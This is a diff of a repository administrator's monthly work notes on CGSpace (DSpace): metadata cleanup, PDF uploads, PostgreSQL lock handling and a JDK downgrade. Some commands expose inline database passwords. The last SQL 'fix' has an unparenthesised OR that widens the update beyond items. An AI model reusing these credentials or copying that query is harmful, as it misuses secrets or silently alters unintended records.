Purging 1094 hits from Gov employment data scraper in statistics
Total number of bot hits purged: 10632
```
- Work on the CIAT Library items a bit again in OpenRefine
- I flagged items with:
- URL containing "#page" at the end (these are linking to book chapters, but we don't want to upload the PDF multiple times)
- Same URL used by more than one item ("Duplicates" facet in OpenRefine, these are some corner case I don't want to handle right now)
- URL containing ":8080" to CIAT's old DSpace (this server is no longer live)
- I want to try to handle the simple cases that should cover most of the items first
## 2022-11-09
- Continue working on the Python script to upload PDFs from CIAT Library to the relevant item on CGSpace
- I got the basic functionality working
## 2022-11-12
- Start a harvest on AReS
## 2022-11-15
- Meeting with Marie-Angelique, Sara, and Valentina about CG Core types
- We agreed to continue adding the feedback for each of the proposed actions
- The others will start filling in definitions for the types
- Sara had some good questions about duplicates on CGSpace and how we can possibly prevent them now that several systems are submitting items directly into the repository
- We need to be careful especially with regards to author's outputs that will be reported in the PRMS
## 2022-11-16
- Maria asked if we can extend the timeout for XMLUI sessions
- According to [this issue](https://gitlab.inf.unibz.it/commul/docker/clarin-dspace/-/issues/44) it seems to be 30 minutes by default, as a Tomcat default
- I think we could extend this to an hour, as there is no real security risk (we're not a bank) and most user's lock screens would have activated after ten minutes or so anyways
## 2022-11-20
- Start a harvest on AReS
## 2022-11-22
- Check and upload some items to CGSpace for Peter
- I am waiting for some feedback from him about some duplicates and metadata issues for the rest
## 2022-11-23
- Fix some authorization issues for ABC's TIP submit tool on DSpace Test (the groups were correct on CGSpace, but not on test)
- Peter sent me feedback about the duplicates and metadata questions from yesterday
- I uploaded the eight items for COHESA and sixty-two for Gender
- I ran the script to tag ORCID identifiers with my `2022-09-22-add-orcids.csv` file and tagged twenty-seven
- Maria asked for help uploading a large PDF to CGSpace
- The PDF is only two pages, but it is 139MB!
- I decided to compress it with GhostScript, first with the screen profile (72dpi), then with the ebook profile (150dpi):
```console
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/screen -dNOPAUSE -dQUIET -dBATCH -sOutputFile=Key\ facts\ from\ a\ traditional\ colombian\ food\ market-screen.pdf Key\ facts\ from\ a\ traditional\ colombian\ food\ market.pdf
$ gs -sDEVICE=pdfwrite -dCompatibilityLevel=1.4 -dPDFSETTINGS=/ebook -dNOPAUSE -dQUIET -dBATCH -sOutputFile=Key\ facts\ from\ a\ traditional\ colombian\ food\ market-ebook.pdf Key\ facts\ from\ a\ traditional\ colombian\ food\ market.pdf
```
- The ebook one looks really good and is only 2.4MB...
- But for reference, this free Adobe tool seems to work: https://www.adobe.com/acrobat/online/compress-pdf.html
## 2022-11-24
- My script finished downloading the CIAT Library PDFs
- I did some more work on my `post-ciat-pdfs.py` script and tested uploading the items to my local DSpace and DSpace Test
- Then I ran the script on CGSpace, uploading ~1,500 PDFs to to existing items
## 2022-11-25
- Tony Murray, who is working on IFPRI's CGSpace integration, emailed me to ask some questions about the REST API
- Oh no, I realized there is a logic issue with the PDFbox cropbox code I added a few weeks ago:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -v -f -i 10568/77010
The following MediaFilters are enabled:
Full Filter Name: org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter
org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter
Loading @mire database changes for module MQM
Changes have been processed
IM Thumbnail tropentag2016_marshall.pdf is replacable.
File: tropentag2016_marshall.pdf.jpg
ERROR filtering, skipping bitstream:
Item Handle: 10568/77010
Bundle Name: ORIGINAL
File Size: 1486580
Checksum: 1ad66d918a56a5e84667386e1a32e352 (MD5)
Asset Store: 0
java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
at org.apache.pdfbox.pdmodel.PDPageTree.get(PDPageTree.java:325)
at org.apache.pdfbox.pdmodel.PDPageTree.get(PDPageTree.java:248)
at org.apache.pdfbox.pdmodel.PDDocument.getPage(PDDocument.java:1543)
at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:167)
at org.dspace.app.mediafilter.ImageMagickPdfThumbnailFilter.getDestinationStream(ImageMagickPdfThumbnailFilter.java:27)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:232)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
```
- Salem gave me a list of CGSpace collections that have double spaces in the names
- Normally this would only be a minor annoyance, but he discovered that the REST API seems to trim the spaces, which causes an issue when trying to reference them!
- He sent me a list of about ten collection UUIDs so I fixed them
- I found a bunch of LIVES presentations on CGSpace that have presentations on SlideShare with incorrect licenses... I updated about fifty of them
## 2022-11-26
- Sync DSpace Test with CGSpace
- I increased the session timeout in Tomcat from thirty minutes to sixty, as requested by Maria a few weeks ago
- See: https://gitlab.inf.unibz.it/commul/docker/clarin-dspace/-/issues/44
- I re-built DSpace on CGSpace, ran all updates, and rebooted the machine
- Then after coming back up the handle server won't start
- The `handle-server.log` file shows:
```console
Shutting down...
"2022/11/26 02:12:17 CET" 25 Rotating log files
Error: null
(see the error log for details.)
```
- In the `error.log` file I see:
```console
"2022/11/26 02:12:18 CET" 25 Started new run.
java.lang.UnsupportedOperationException
at java.lang.Runtime.runFinalizersOnExit(Runtime.java:287)
at java.lang.System.runFinalizersOnExit(System.java:1059)
at net.handle.server.Main.initialize(Main.java:124)
at net.handle.server.Main.main(Main.java:75)
Shutting down...
```
- Ah, it seems to be due to an [issue in OpenJDK 1.8.0_352](https://groups.google.com/g/dspace-tech/c/PqjfA5mqG4w/m/FhxI5oXhFwAJ?pli=1)
- I see the server upgraded to the new JDK version on 2022-11-10:
```console
Upgrade: openjdk-8-jdk-headless:amd64 (8u342-b07-0ubuntu1~20.04, 8u352-ga-1~20.04), openjdk-8-jre-headless:amd64 (8u342-b07-0ubuntu1~20.04, 8u352-ga-1~20.04)
End-Date: 2022-11-10 04:10:45
```
- As highlighted in the dspace-tech mailing list thread above, [this OpenJDK release deprecated `Runtime.runFinalizersOnExit`](https://mail.openjdk.org/pipermail/jdk8u-dev/2022-October/015706.html):
```console
- JDK-8287132: Retire Runtime.runFinalizersOnExit so that it always throws UOE
```
- I downloaded the previous versions of the packages from Launchpad:
```console
# wget https://launchpad.net/~openjdk-security/+archive/ubuntu/ppa/+build/24195357/+files/openjdk-8-jdk-headless_8u342-b07-0ubuntu1~20.04_amd64.deb
# wget https://launchpad.net/~openjdk-security/+archive/ubuntu/ppa/+build/24195357/+files/openjdk-8-jre-headless_8u342-b07-0ubuntu1~20.04_amd64.deb
# dpkg -i openjdk-8-j*8u342-b07*.deb
```
- Then the handle-server process starts up fine, so I held these OpenJDK versions for now:
```console
# apt-mark hold openjdk-8-jdk-headless:amd64 openjdk-8-jre-headless:amd64
openjdk-8-jdk-headless set on hold.
openjdk-8-jre-headless set on hold.
```
- Start a harvest on AReS
## 2022-11-27
- I realized I made a mistake in the PDF CropBox code I wrote for dspace-api a few weeks ago
- For PDFs with only one page I was seeing this in the filter-media output:
```console
java.lang.IndexOutOfBoundsException: 1-based index out of bounds: 2
```
- It turns out that [PDDocument's getPage() is zero-based](https://javadoc.io/static/org.apache.pdfbox/pdfbox/2.0.27/org/apache/pdfbox/pdmodel/PDDocument.html#getPage-int-)
- I also updated PDFBox from 2.0.24 to 2.0.27
- I synced DSpace 7 Test with CGSpace
- I had to follow my notes from 2022-03 to delete the missing Atmire migrations
## 2022-11-28
- Update `ilri/fix-metadata-values.py` to update the `last_modified` date for items when it updates metadata
- This should allow us to use the normal `index-discovery` (with out `-b`) as well as having REST API responses showing a correct last modified date
- Maria asked me to add some ORCID identifiers for Alliance staff to the controlled vocabulary
- I also updated the `add-orcid-identifiers-csv.py` to update the `last_modified` timestamp of the item
- I re-factored my CGSpace Python scripts to use a helper `util.py` module with common functions
- For now it only has the one for updating an item's `last_modified` timestamp but I will gradually add more
- I also ran our list of ORCID identifiers against ORCID's API to see if anyone changed their name format
- Then I ran them on CGSpace with `ilri/update-orcids.py` to fix them
- Normalize the `text_lang` values for CGSpace metadata again:
```console
localhost/dspacetest= ☘ SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang │ count
───────────┼─────────
en_US │ 2912429
│ 108387
en │ 12457
fr │ 2
vi │ 2
es │ 1
␀ │ 0
(7 rows)
Time: 624.651 ms
localhost/dspacetest= ☘ BEGIN;
BEGIN
Time: 0.130 ms
localhost/dspacetest= ☘ UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '');
UPDATE 120844
Time: 4074.879 ms (00:04.075)
localhost/dspacetest= ☘ SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang │ count
───────────┼─────────
en_US │ 3033273
fr │ 2
vi │ 2
es │ 1
␀ │ 0
(5 rows)
Time: 346.913 ms
localhost/dspacetest= ☘ COMMIT;
```
- Discussing the UN M.49 regions on CGSpace with Valentina and Abenet
- The PRMS team is confused about our regions, which are mostly UN M.49 with some legacy stuff using different ones
- I think we can fix all the stuff for Initiatives from this year very easily, then work on the legacy stuff later
- Also, I noticed that that [country_converter was using the wrong UN M.49 region for Myanmar](https://github.com/konstantinstadler/country_converter/issues/124)
- I submitted a [pull request](https://github.com/konstantinstadler/country_converter/pull/125)
- I exported a CSV of the Initiatives and ran the csv-metadata-quality script to add missing UN M.49 regions
- To make sure everything was correct I got a list of the changes from csv-metadata-quality and checked them all manually on the UN M.49 site, just in case there was another bug in country_converter
- This fixed regions for about fifty items
- I dumped the UN M.49 regions from the CSV on the UNSD website:
```console
$ csvcut -d";" -c 'Region Name,Sub-region Name,Intermediate Region Name' ~/Downloads/UNSD\ \ Methodology.csv | sed -e 1d -e 's/,/\n/g' | sort -u
Africa
Americas
Asia
Australia and New Zealand
Caribbean
Central America
Central Asia
Channel Islands
Eastern Africa
Eastern Asia
Eastern Europe
Europe
Latin America and the Caribbean
Melanesia
Micronesia
Middle Africa
Northern Africa
Northern America
Northern Europe
Oceania
Polynesia
South America
South-eastern Asia
Southern Africa
Southern Asia
Southern Europe
Sub-Saharan Africa
Western Africa
Western Asia
Western Europe
```
- For now I will combine it with our existing list, which contains a few legacy regions, while we discuss about a long-term plan with Peter and Abenet
- Peter wrote to ask me to change the PIM CRP's full name from `Policies, Institutions and Markets` to `Policies, Institutions, and Markets`
- It's apparently the only CRP with an Oxford comma...?
- I updated them all on CGSpace
- Also, I ran an `index-discovery` without the `-b` since now my metadata update scripts update the `last_modified` timestamp as well and it finished in fifteen minutes, and I see the changes in the Discovery search and facets
## 2022-11-29
- Meeting with Marie-Angelique, Abenet, Sara, Valentina, and Margarita about `dcterms.type` for CG Core
- We discussed some of the feedback from Peter
- Peter and Abenet and I agreed to update some of our metadata in response to the PRMS feedback
- I updated Pacific to Oceania, and Central Africa to Middle Africa, and removed the old ones from the submission form
- These are UN M.49 regions
## 2022-11-30
- I ran csv-metadata-quality on an export of the ILRI community on CGSpace, but only with title, country, and region fields
- It fixed some whitespace issues and added missing regions to about 1,200 items
- I thought of a way to delete duplicate metadata values, since the CSV upload method can't detect them correctly
- First, I wrote a [SQL query](https://chartio.com/learn/databases/how-to-find-duplicate-values-in-a-sql-table/) to identify metadata falues with the same `text_value`, `metadata_field_id`, and `dspace_object_id`:
```console
\COPY (SELECT a.text_value, a.metadata_value_id, a.metadata_field_id, a.dspace_object_id
FROM metadatavalue a
JOIN (
SELECT dspace_object_id, text_value, metadata_field_id, COUNT(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id NOT IN (11, 12, 28, 136, 159) GROUP BY dspace_object_id, text_value, metadata_field_id HAVING COUNT(*) > 1
) b
ON a.dspace_object_id = b.dspace_object_id
AND a.text_value = b.text_value
AND a.metadata_field_id = b.metadata_field_id
ORDER BY a.text_value) TO /tmp/duplicates.txt
```
- (This query excludes metadata for accession and available dates, provenance, format, etc)
- Then, I sorted the file by fields four and one (`dspace_object_id` and `text_value`) so that the duplicate metadata for each item were next to each other, used awk to print the second field (`metadata_field_id`) from every _other_ line, and created a SQL script to delete the metadata
```console
$ sort -k4,1 /tmp/duplicates.txt | \
awk -F'\t' 'NR%2==0 {print $2}' | \
sed 's/^\(.*\)$/DELETE FROM metadatavalue WHERE metadata_value_id=\1;/' > /tmp/delete-duplicates.sql
```
- This worked very well, but there were some metadata values that were tripled or quadrupled, so it only deleted the first duplicate
- I just ran it again two more times to find the last duplicates, now we have none!
- I also generated another SQL file with commands to update the last modified timestamps of these items:
```console
$ awk -F'\t' '{print $4}' /tmp/duplicates.txt | sort -u | sed "s/^\(.*\)$/UPDATE item SET last_modified=NOW() WHERE uuid='\1';/" > /tmp/update-timestamp.sql
```
- Tezira said she was having trouble archiving submissions
- In the afternoon I looked and found a high number of locks:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c | sort -n
60 dspaceCli
176 dspaceApi
1194 dspaceWeb
```
![PostgreSQL database locks](/cgspace-notes/2022/11/postgres_locks_cgspace-day.png)
- The timing looks suspiciously close to when I was running the batch updates on the ILRI community this morning.
- I restarted Tomcat and PostgreSQL and everything was back to normal
- I found some items on CGSpace in Dinka, Ndogo, and Bari languages, but the `dcterms.language` field was "other"
- That's so unfortunate! These languages are not in ISO 639-1, but they are in ISO 639-3, which uses Alpha 3 and has more space for languages
- I changed them from other to use the three-letter codes, and I will suggest to the CG Core group that we use ISO 639-3 in the future
- Send feedback to Salem about some metadata issues with MEL submissions to CGSpace
<!-- vim: set sw=2 ts=2: -->

378
content/posts/2022-12.md Normal file
View File

@ -0,0 +1,378 @@
---
title: "December, 2022"
date: 2022-12-01T08:52:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-12-01
- Fix some incorrect regions on CGSpace
- I exported the CCAFS and IITA communities, extracted just the country and region columns, then ran them through csv-metadata-quality to fix the regions
- Add a few more authors to my CSV with author names and ORCID identifiers and tag 283 items!
- Replace "East Asia" with "Eastern Asia" region on CGSpace (UN M.49 region)
<!--more-->
- CGSpace and PRMS information session with Enrico and a bunch of researchers
- I noticed some minor issues with SPDX licenses and AGROVOC terms in items submitted by TIP so I sent a message to Daniel from Alliance
- I startd a harvest on AReS since we've updated so much metadata recently
## 2022-12-02
- File some issues related to metadata on the MEL issue tracker
- [Only use "Open Access" or "Limited Access" access rights when publishing items on CGSpace](https://github.com/CodeObia/MEL/issues/11066)
- [Set the description when submitting bitstreams to CGSpace](https://github.com/CodeObia/MEL/issues/11067)
- [Some items have a Creative Commons license, but are Limited Access and bitstreams are locked](https://github.com/CodeObia/MEL/issues/11068)
## 2022-12-03
- I downloaded a fresh copy of CLARISA's institutions list as well as ROR's latest dump from 2022-12-01 to check how many are matching:
```console
$ curl -s https://api.clarisa.cgiar.org/api/institutions | json_pp > ~/Downloads/2022-12-03-CLARISA-institutions.json
$ jq -r '.[] | .name' ~/Downloads/2022-12-03-CLARISA-institutions.json > ~/Downloads/2022-12-03-CLARISA-institutions.txt
$ ./ilri/ror-lookup.py -i ~/Downloads/2022-12-03-CLARISA-institutions.txt -o /tmp/clarisa-ror-matches.csv -r v1.15-2022-12-01-ror-data.json
$ csvgrep -c matched -m true /tmp/clarisa-ror-matches.csv | wc -l
1864
$ wc -l ~/Downloads/2022-12-03-CLARISA-institutions.txt
7060 /home/aorth/Downloads/2022-12-03-CLARISA-institutions.txt
```
- Out of the box they match 26.4%, but there are many institutions with multiple languages in the text value, as well as countries in parentheses so I think it could be higher
- If I replace the slashes and remove the countries at the end there are slightly more matches, around 29%:
```console
$ sed -e 's_ / _\n_' -e 's_/_\n_' -e 's/ \?(.*)$//' ~/Downloads/2022-12-03-CLARISA-institutions.txt > ~/Downloads/2022-12-03-CLARISA-institutions-alan.txt
```
- I checked CGSpace's top 1,000 affiliations too, first exporting from PostgreSQL:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC LIMIT 1000) to /tmp/2022-11-22-affiliations.csv;
```
- Then cutting (tab is the default delimeter):
```console
$ cut -f 1 /tmp/2022-11-22-affiliations.csv > 2022-11-22-affiliations.txt
$ ./ilri/ror-lookup.py -i 2022-11-22-affiliations.txt -o /tmp/cgspace-matches.csv -r v1.15-2022-12-01-ror-data.json
$ csvgrep -c matched -m true /tmp/cgspace-matches.csv | wc -l
542
```
- So that's a 54% match for our top affiliations
- I realized we should actually check affiliations and sponsors, since those are stored in separate fields
- When I add those the matches go down a bit to 45%
- Oh man, I realized institutions like `Université d'Abomey Calavi` don't match in ROR because they are like this in the JSON:
```console
"name": "Universit\u00e9 d'Abomey-Calavi"
```
- So we likely match a bunch more than 50%...
- I exported a list of affiliations and donors from CGSpace for Peter to look over and send corrections
## 2022-12-05
- First day of PRMS technical workshop in Rome
- Last night I submitted a CSV import with changes to 1,500 Alliance items (adding regions) and it hadn't completed after twenty-four hours so I canceled it
- Not sure if there is some rollback that will happen or what state the database will be in, so I will wait a few hours to see what happens before trying to modify those items again
- I started it again a few hours later with a subset of the items and 4GB of RAM instead of 2
- It completed successfully...
## 2022-12-07
- I found a bug in my csv-metadata-quality script regarding the regions
- I was accidentally checking `cg.coverage.subregion` due to a sloppy regex
- This means I've added a few thousand UN M.49 regions to the `cg.coverage.subregion` field in the last few days
- I had to extract them from CGSpace and delete them using `delete-metadata-values.py`
- My [DSpace 7.x pull request to tell ImageMagick about the PDF CropBox](https://github.com/DSpace/DSpace/pull/8550) was merged
- Start a harvest on AReS
## 2022-12-08
- While on the plane I decided to fix some ORCID identifiers, as I had seen some poorly formatted ones
- I couldn't remember the XPath syntax so this was kinda ghetto:
```console
$ xmllint --xpath '//node/isComposedBy/node()' dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE 'label=".*"' | sed -e 's/label="//' -e 's/"$//' > /tmp/orcid-names.txt
$ ./ilri/update-orcids.py -i /tmp/orcid-names.txt -db dspace -u dspace -p 'fuuu' -m 247
```
- After that there were still some poorly formatted ones that my script didn't fix, so perhaps these are new ones not in our list
- I dumped them and combined with the existing ones to resolve later:
```console
localhost/dspace= ☘ \COPY (SELECT dspace_object_id,text_value FROM metadatavalue WHERE metadata_field_id=247 AND text_value LIKE '%http%') to /tmp/orcid-formatting.txt;
COPY 36
```
- I think there are really just some new ones...
```console
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/orcid-formatting.txt| grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2022-12-08-orcids.txt
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u | wc -l
1907
$ wc -l /tmp/2022-12-08-orcids.txt
1939 /tmp/2022-12-08-orcids.txt
```
- Then I applied these updates on CGSpace
- Maria mentioned that she was getting a lot more items in her daily subscription emails
- I had a hunch it was related to me updating the `last_modified` timestamp after updating a bunch of countries, regions, etc in items
- Then today I noticed this option in `dspace.cfg`: `eperson.subscription.onlynew`
- By default DSpace sends notifications for modified items too! I've disabled it now...
- I applied 498 fixes and two deletions to affiliations sent by Peter
- I applied 206 fixes and eighty-one deletions to donors sent by Peter
- I tried to figure out how to authenticate to the DSpace 7 REST API
- First [you need a CSRF token](https://github.com/DSpace/RestContract/blob/main/csrf-tokens.md), before you can even try to authenticate
- Then you can authenticate, but I can't get it to work:
```console
$ curl -v https://dspace7test.ilri.org/server/api
...
dspace-xsrf-token: 0b7861fb-9c8a-4eea-be70-b3be3bd0a0b4
...
$ curl -v -X POST --data "user=aorth@omg.com&password=myPassword" "https://dspace7test.ilri.org/server/authn/login" -H "X-XSRF-TOKEN: 0b7861fb-9c8a-4eea-be70-b3be3bd0a0b4"
```
- Start a harvest on AReS
## 2022-12-09
- I found a way to check the owner of a Handle prefix
- You query the admin Handle for the prefix, ie: https://hdl.handle.net/0.na/10568
## 2022-12-11
- I got LDAP authentication working on DSpace 7
## 2022-12-12
- Submit some issues to MEL GitHub:
- [Links to https://mel.cgiar.org/dspace/limited for Limited Access items on CGSpace](https://github.com/CodeObia/MEL/issues/11081)
- [Items submitted to CGSpace without Initiative](https://github.com/CodeObia/MEL/issues/11083)
- PRMS planning meeting before tomorrow's meeting with researchers and submitters
## 2022-12-13
- I made some minor changes to csv-metadata-quality
- I switched to using the SPDX license data as a JSON directly from SPDX, instead of via the now-deprecated spdx-license-list package on pypi
- I exported the Initiatives collection to tag missing regions
- I submitted an issue to MEL GitHub:
- [Set the description of bitstreams in the THUMBNAIL bundle to "IM Thumbnail" when submitting to CGSpace](https://github.com/CodeObia/MEL/issues/11084)
- Submit a pull request to [fix the Handle link in the Citizen Lab test URLs for Iran](https://github.com/citizenlab/test-lists/pull/1199)
- I had originally submitted this in 2018, but it seems someone updated the URL in 2020... hmmm
- I normalized the `text_lang` values on CGSpace again:
```console
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 3050302
en | 618
| 605
fr | 2
vi | 2
es | 1
| 0
(7 rows)
dspace=# BEGIN;
BEGIN
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', '', NULL);
UPDATE 1223
dspace=# COMMIT;
COMMIT
```
- I wrote an initial version of a script to map CGSpace items to Initiative collections based on their `cg.contributor.initiative` metadata
- I am still considering if I want to add a mode to *un-map* items that are mapped to collections, but do not have the corresponding metadata tag
## 2022-12-14
- Lots of work on PRMS related metadata issues with CGSpace
- We noticed that PRMS uses `cg.identifier.dataurl` for the FAIR score, but not `cg.identifier.url`
- We don't use these consistently for datasets in CGSpace so I decided to move them to the dataurl field, but we will also ask the PRMS team to consider the normal URL field, as there are commonly other external resources related to the knowledge product there
- I updated the `move-metadata-values.py` script to use the latest best practices from my other scripts and some of the helper functions from `util.py`
- Then I exported a list of text values pointing to Dataverse instances from `cg.identifier.url`:
```console
localhost/dspace= ☘ \COPY (SELECT text_value FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=219 AND (text_value LIKE '%persistentId%' OR text_value LIKE '%20.500.11766.1/%')) to /tmp/data.txt;
COPY 61
```
- Then I moved them to `cg.identifier.dataurl` on CGSpace:
```console
$ ./ilri/move-metadata-values.py -i /tmp/data.txt -db dspace -u dspace -p 'dom@in34sniper' -f cg.identifier.url -t cg.identifier.dataurl
```
- I still need to add a note to the CGSpace submission form to inform submitters about the correct field for dataset URLs
- I finalized work on my new `fix-initiative-mappings.py` script
- It has two modes:
1. Check item metadata to see which Initiatives are tagged and then map the item if it is not yet mapped to the corresponding Initiative collection
2. Check item collections to see which Initiatives are mapped and then unmap the item if the corresponding Initiative metadata is missing
- The second one is disabled by default until I can get more feedback from Abenet, Michael, and others
- After I applied a handful of collection mappings I started a harvest on AReS
## 2022-12-15
- I did some metadata quality checks on the Initiatives collection, adding some missing regions and removing a few duplicate ones
## 2022-12-18
- Load on the server is a bit high
- Looking at the nginx logs I see someone from the University of Chicago (128.135.98.29) is using RStudio Desktop to query and scrape CGSpace
```
# grep -c 'RStudio Desktop' /var/log/nginx/access.log
5570
```
- RStudio is already in the ILRI bot overrides for DSpace so it shouldn't be causing any extra hits, but I'll put an HTTP 403 in the nginx config to tell the user to use the REST API
- Start a harvest on AReS
## 2022-12-21
- I saw that load on CGSpace was over 20.0 for several hours
- I saw there were some stuck locks in PostgreSQL:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
948 dspaceApi
30 dspaceCli
1237 dspaceWeb
```
- Ah, it's likely there is something stuck because I see the load high since yesterday at 6AM, which is 24 hours now:
![CPU load day](/cgspace-notes/2022/12/cpu-day.png)
![PostgreSQL locks week](/cgspace-notes/2022/12/postgres_locks_ALL-week.png)
- I ran all updates and restarted the server
## 2022-12-22
- I exported the Initiatives collection to check the mappings
- My `fix-initiative-mappings.py` script found six items that could be mapped to new collections based on metadata
- I am still not doing automatic _unmappings_ though...
## 2022-12-23
- I exported the Initiatives collection to check the metadata quality
- I fixed a few errors and missing regions using csv-metadata-quality
- Abenet and Bizu noticed some strange characters in affiliations submitted by MEL
- They appear like so in four items currently `Instituto Nacional de Investigaci<63>n y Tecnolog<6F>a Agraria y Alimentaria, Spain`
- I submitted [an issue](https://github.com/CodeObia/MEL/issues/11108) on MEL's GitHub repository
## 2022-12-24
- Export the ILRI community to try to see if there were any items with Initiative metadata that are not mapped to Initiative collections
- I found about twenty...
- Then I did the same for the AICCRA community
## 2022-12-25
- The load on the server is high and I see some seemingly stuck PostgreSQL locks from dspaceCli:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
44 dspaceApi
58 dspaceCli
```
- [Looking into this more](https://jaketrent.com/post/find-kill-locks-postgres/) I see the PIDs for the dspaceCli locks:
```sql
SELECT pl.pid FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE psa.application_name = 'dspaceCli'
```
- And the SQL queries themselves:
```console
postgres=# SELECT pid, state, usename, query, query_start
FROM pg_stat_activity
WHERE pid IN (
SELECT pl.pid FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE psa.application_name = 'dspaceCli'
);
```
- For these fifty-eight locks there are only six queries running
- Interestingly, they all started at either 04:00 or 05:00 this morning...
- I canceled one using `SELECT pg_cancel_backend(1098749);` and then two of the other PIDs died, perhaps they were dependent?
- Then I canceled the next one and the remaining ones died also
- I exported the entire CGSpace and then ran the `fix-initiative-mappings.py` script, which found 124 items to be mapped
- Getting only the items that have new mappings from the output file is currently tricky because you have to change the file to unix encoding, capture the diff output from the original, and re-add the column headers, but at least this makes the DSpace batch import have to check WAY fewer items
- For the record, I used grep to get only the new lines:
```console
$ grep -xvFf /tmp/orig.csv /tmp/cgspace-mappings.csv > /tmp/2022-12-25-fix-mappings.csv
```
- Then I imported to CGSpace, and will start an AReS harvest once its done
- The import process was quick but it triggered a lot of Solr updates and I see locks rising from dspaceCli again
- After five hours the Solr updating from the metadata import wasn't finished, so I cancelled it, and I see that the items were *not* mapped...
- I split the CSV into multiple files, each with ten items, and the first one imported, but the second went on to do Solr updating stuff forever...
- All twelve files worked except the second one, so it must be something with one of those items...
- Now I started a harvest on AReS
## 2022-12-28
- I got a notice from UptimeRobot that CGSpace was down
- I look at the server and the load is only 3 or 4.x and looking at Munin I don't see any system statistics that are alarming
- PostgreSQL locks look fine, memory and DSpace sessions look fine...
- There were a strangely high number of tuple accesses half an hour ago, and high CPU going up to then
![PostgreSQL tuple access](/cgspace-notes/2022/12/postgres_tuples_cgspace-day.png)
![CPU day](/cgspace-notes/2022/12/cpu-day2.png)
- And I can access the website just fine, so I guess everything is OK
- I exported the Initiatives collection to tag missing regions...
## 2022-12-29
- I exported the Initiatives collection again and I'm wondering why we have so many items with `text_lang` set to NULL and others when I have been periodically resetting them
- It turns out that doing `... text_lang IN ('en', '', NULL)` doesn't properly check for values with NULL
- We actually need to do:
```sql
UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IS NULL OR text_lang IN ('en', '');
```
- I updated the text lang values on CGSpace and re-exported the community
- I fixed a bunch of invalid licenses in these items
- Then I added mappings for another handful of items
- I tagged ORCID identifiers for another thirty items or so
- At 8PM I got a notice from UptimeRobot again that CGSpace was down
- The load is still only around 2.x or 3.x, but there are a lot (and increasing) number of PostgreSQL connections and locks
- They appear to be all from the frontend:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
2892 dspaceWeb
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
2950 dspaceWeb
